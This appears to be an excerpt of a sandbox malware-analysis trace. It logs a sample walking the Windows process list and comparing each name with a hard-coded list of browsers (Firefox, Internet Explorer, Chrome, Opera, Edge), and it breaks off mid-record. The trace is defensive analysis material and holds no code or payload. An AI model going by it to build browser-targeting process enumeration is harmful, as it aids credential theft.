[0173.561] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.561] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.561] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.562] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.562] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.562] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.562] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.562] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.562] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.563] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.563] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.563] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.564] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.564] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.564] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.564] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.564] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.564] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0173.564] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0173.564] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0173.564] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0173.565] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0173.565] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.565] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.565] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.565] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.565] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.565] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.565] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.565] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.566] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.566] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.566] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.566] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.566] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.566] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.566] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0173.566] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0173.566] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0173.567] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0173.567] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.567] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.567] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0173.567] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0173.567] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0173.567] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0173.567] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.567] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.568] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0173.568] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0173.568] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0173.568] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0173.568] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.568] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.568] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.568] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.568] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.568] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.568] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.568] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0173.569] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0173.569] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0173.569] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0173.569] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0173.569] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.569] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0173.569] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0173.569] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0173.570] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0173.570] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0173.570] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.570] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0173.570] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0173.570] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0173.570] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0173.570] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0173.570] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.570] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0173.571] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0173.571] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0173.571] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0173.571] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0173.571] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.571] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0173.571] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0173.571] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0173.571] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0173.571] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0173.571] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.571] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0173.572] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0173.572] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0173.572] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0173.572] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0173.572] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.572] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0173.572] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0173.573] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0173.573] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0173.573] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0173.573] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.573] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0173.573] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0173.573] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0173.573] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0173.573] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0173.573] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.573] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0173.574] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0173.574] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0173.574] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0173.574] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0173.574] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.574] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0173.574] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0173.574] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0173.574] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0173.575] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0173.575] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.575] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0173.575] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0173.575] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0173.575] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0173.575] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0173.575] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.575] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0173.576] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0173.576] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0173.576] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0173.576] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0173.576] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.576] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0173.576] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0173.576] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0173.576] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0173.576] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0173.576] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.576] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0173.577] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0173.577] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0173.577] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0173.577] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0173.577] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.577] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0173.577] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0173.577] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0173.577] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0173.577] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0173.578] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.578] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0173.578] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0173.578] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0173.578] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0173.578] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0173.578] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.578] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0173.579] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0173.579] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0173.579] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0173.579] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0173.579] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.579] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0173.579] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0173.579] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0173.579] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0173.579] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0173.579] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.579] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0173.580] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0173.580] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0173.580] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0173.580] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0173.580] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.580] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0173.580] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0173.580] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0173.580] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0173.580] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0173.580] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.581] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0173.581] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0173.581] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0173.581] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0173.581] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0173.581] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.581] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0173.582] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0173.582] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0173.582] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0173.582] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0173.582] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.582] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.582] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0173.582] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0173.582] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0173.582] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0173.582] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.582] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.583] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.583] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.583] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.583] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.583] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.583] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0173.583] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0173.583] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0173.583] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0173.583] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0173.583] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.584] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, 